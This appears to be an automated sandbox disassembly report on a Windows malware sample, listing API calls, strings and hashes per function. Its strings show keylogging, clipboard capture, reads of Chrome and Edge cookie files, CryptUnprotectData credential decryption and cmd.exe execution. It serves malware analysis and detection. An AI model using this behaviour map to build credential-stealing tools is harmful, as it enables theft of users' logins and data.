                                              • Opcode Fuzzy Hash: 19a75f4089cd682c196d93085774e8610958794b4b53e2c59ee42357a682b9a9
                                              • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                              APIs
                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                              • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Init_thread_footer__onexit
                                              • String ID: [End of clipboard]$[Text copied to clipboard]$xdF
                                              • API String ID: 1881088180-1310280921
                                              • Opcode ID: 817b4c01eafabb62cefe08f25f435df96e29b2123a05dda1d2c5d8970e98f987
                                              • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                              • Opcode Fuzzy Hash: 817b4c01eafabb62cefe08f25f435df96e29b2123a05dda1d2c5d8970e98f987
                                              • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                              APIs
                                              • _free.LIBCMT ref: 004495B3
                                              • _free.LIBCMT ref: 00449609
                                                • Part of subcall function 004493E5: _free.LIBCMT ref: 0044943D
                                                • Part of subcall function 004493E5: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                • Part of subcall function 004493E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                • Part of subcall function 004493E5: WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                              • String ID: v%(/
                                              • API String ID: 314583886-2435473048
                                              • Opcode ID: 7157d135af61fd44e2cb6d5b559f28f12d3d349b8bb5886b655d4841be14934b
                                              • Instruction ID: da5c51787f9f1a1f19b75189942e14dcbf4476fdba08df6e704f400b95fb1742
                                              • Opcode Fuzzy Hash: 7157d135af61fd44e2cb6d5b559f28f12d3d349b8bb5886b655d4841be14934b
                                              • Instruction Fuzzy Hash: 6D21517380011577FF31B7259C81DEB7368DB45724F21029BF898A3181EB784EC19A9D
                                              APIs
                                              • _wcslen.LIBCMT ref: 00416330
                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _wcslen$CloseCreateValue
                                              • String ID: !D@$okmode$PG
                                              • API String ID: 3411444782-3370592832
                                              • Opcode ID: 32b767abda9d74a658984582e830535edcfbd4fa180c3dcb91f0b96cbdeabe52
                                              • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                              • Opcode Fuzzy Hash: 32b767abda9d74a658984582e830535edcfbd4fa180c3dcb91f0b96cbdeabe52
                                              • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                              APIs
                                                • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                              Strings
                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                              • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                              • API String ID: 1174141254-1980882731
                                              • Opcode ID: 2a38480921e4d6be1d5b2529be3b715cdf247bf3a0a1df31f1585b54042120b5
                                              • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                              • Opcode Fuzzy Hash: 2a38480921e4d6be1d5b2529be3b715cdf247bf3a0a1df31f1585b54042120b5
                                              • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                              APIs
                                                • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                              Strings
                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                              • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                              • API String ID: 1174141254-1980882731
                                              • Opcode ID: 48aa145b66dc80a11566b4620fdd9ce13eae5fb2ee34664654c02424daf75182
                                              • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                              • Opcode Fuzzy Hash: 48aa145b66dc80a11566b4620fdd9ce13eae5fb2ee34664654c02424daf75182
                                              • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                              APIs
                                              • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                              • wsprintfW.USER32 ref: 0040B22E
                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EventLocalTimewsprintf
                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                              • API String ID: 1497725170-1359877963
                                              • Opcode ID: 58d3a23b94d8cd78535e1a51a4d83277ead2fee3ca3e9392ef7fdbbbb876cc50
                                              • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                              • Opcode Fuzzy Hash: 58d3a23b94d8cd78535e1a51a4d83277ead2fee3ca3e9392ef7fdbbbb876cc50
                                              • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                              APIs
                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                              • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTime$wsprintf
                                              • String ID: Online Keylogger Started
                                              • API String ID: 112202259-1258561607
                                              • Opcode ID: 0fcd38e96aacb40c04b118771990cdae8bba74e61c9056a984dbcae37755a7c2
                                              • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                              • Opcode Fuzzy Hash: 0fcd38e96aacb40c04b118771990cdae8bba74e61c9056a984dbcae37755a7c2
                                              • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,00000000,0040F3F6,?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE42
                                              • GetLastError.KERNEL32(?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE4C
                                              • __dosmaperr.LIBCMT ref: 0044BE77
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseErrorHandleLast__dosmaperr
                                              • String ID: pt\
                                              • API String ID: 2583163307-2185105519
                                              • Opcode ID: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                              • Instruction ID: c640735ad7e51643fe6b0a0a71fefea3e0d0f945221813f090adf85c72c27ea1
                                              • Opcode Fuzzy Hash: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                              • Instruction Fuzzy Hash: AC01483260066866E624623858457BF6789CBC2739F35022FFE18872C3DF6CCC8181D9
                                              APIs
                                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                              • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: CryptUnprotectData$crypt32
                                              • API String ID: 2574300362-2380590389
                                              • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                              • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                              • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                              • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                              • CloseHandle.KERNEL32(?), ref: 004051CA
                                              • SetEvent.KERNEL32(?), ref: 004051D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandleObjectSingleWait
                                              • String ID: Connection Timeout
                                              • API String ID: 2055531096-499159329
                                              • Opcode ID: cfa6aba80e3ab73a333b17ef678a4c224e2718187884c1035a1560e2fee3ab95
                                              • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                              • Opcode Fuzzy Hash: cfa6aba80e3ab73a333b17ef678a4c224e2718187884c1035a1560e2fee3ab95
                                              • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Exception@8Throw
                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                              • API String ID: 2005118841-1866435925
                                              • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                              • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                              • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                              • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                              APIs
                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                              • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,8)[), ref: 00413888
                                              • RegCloseKey.ADVAPI32(?,?,0040F85E,pth_unenc,8)[), ref: 00413893
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: pth_unenc
                                              • API String ID: 1818849710-4028850238
                                              • Opcode ID: d69e82d7a202b39eabff8c6d6945ecb801863ff8e3666436e459375cd1f846cd
                                              • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                              • Opcode Fuzzy Hash: d69e82d7a202b39eabff8c6d6945ecb801863ff8e3666436e459375cd1f846cd
                                              • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                              • String ID: bad locale name
                                              • API String ID: 3628047217-1405518554
                                              • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                              • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                              • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                              • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                              APIs
                                              • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocaleValid
                                              • String ID: IsValidLocaleName$kKD$v%(/
                                              • API String ID: 1901932003-796097221
                                              • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                              • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                              • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                              • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                              • ShowWindow.USER32(00000009), ref: 00416C9C
                                              • SetForegroundWindow.USER32 ref: 00416CA8
                                                • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(0C[), ref: 0041CE35
                                                • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                              • String ID: !D@
                                              • API String ID: 186401046-604454484
                                              • Opcode ID: dddbeebbe8cb821cdc8b1c7d2847af7eb141aaddcd72dd608c7fa4ca11ce81ef
                                              • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                              • Opcode Fuzzy Hash: dddbeebbe8cb821cdc8b1c7d2847af7eb141aaddcd72dd608c7fa4ca11ce81ef
                                              • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID: /C $cmd.exe$open
                                              • API String ID: 587946157-3896048727
                                              • Opcode ID: 16ef31fdaf301ba362d07f058173c5de43aaddf50e1ff7222e4b3bcda840a0cd
                                              • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                              • Opcode Fuzzy Hash: 16ef31fdaf301ba362d07f058173c5de43aaddf50e1ff7222e4b3bcda840a0cd
                                              • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                              APIs
                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                              Strings
                                              Memory Dump Source
